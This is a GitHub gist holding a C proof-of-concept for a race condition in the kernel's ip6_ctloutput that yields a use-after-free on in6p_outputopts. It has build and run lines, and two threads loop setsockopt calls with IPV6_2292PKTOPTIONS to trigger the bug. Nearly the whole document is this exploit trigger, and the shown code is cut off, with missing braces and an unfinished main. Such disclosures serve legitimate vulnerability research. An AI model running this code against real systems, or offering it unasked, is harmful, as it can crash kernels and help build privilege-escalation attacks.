Skip to content

Instantly share code, notes, and snippets.


Fire30/uaf.c Secret

Created Jul 6, 2020
What would you like to do?
* Race condition in ip6_ctloutput where in6p is not locked when calling
* ip6_pcbopts, which allows for a use after free on in6p->in6p_outputopts
* Build: gcc -std=c99 -o poc poc.c -lpthread
* Run: ./poc
* Discovered by TJ Corley 8/15/2018
#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#define IPV6_2292PKTOPTIONS 25
int s;
static void spam_valid() {
char ctrl[CMSG_SPACE(sizeof(int))];
struct cmsghdr *cmsg = (struct cmsghdr *)&ctrl;
cmsg->cmsg_len = CMSG_LEN(4);
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_TCLASS;
char *data = (char *)CMSG_DATA(cmsg);
*(int *)data = 0x4;
printf("spamming valid IPV6_2292PKTOPTIONS\n");
for (;;) {
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, CMSG_LEN(4));
static void spam_zero_size_mbuf() {
char *buf[0x4] = {};
printf("spamming zero size mbuf\n");
for (;;) {
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, 0);
int main() {
pthread_t t;
s = socket(AF_INET6, SOCK_DGRAM, 0);
pthread_create(&t, NULL, (void *)spam_valid, NULL);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment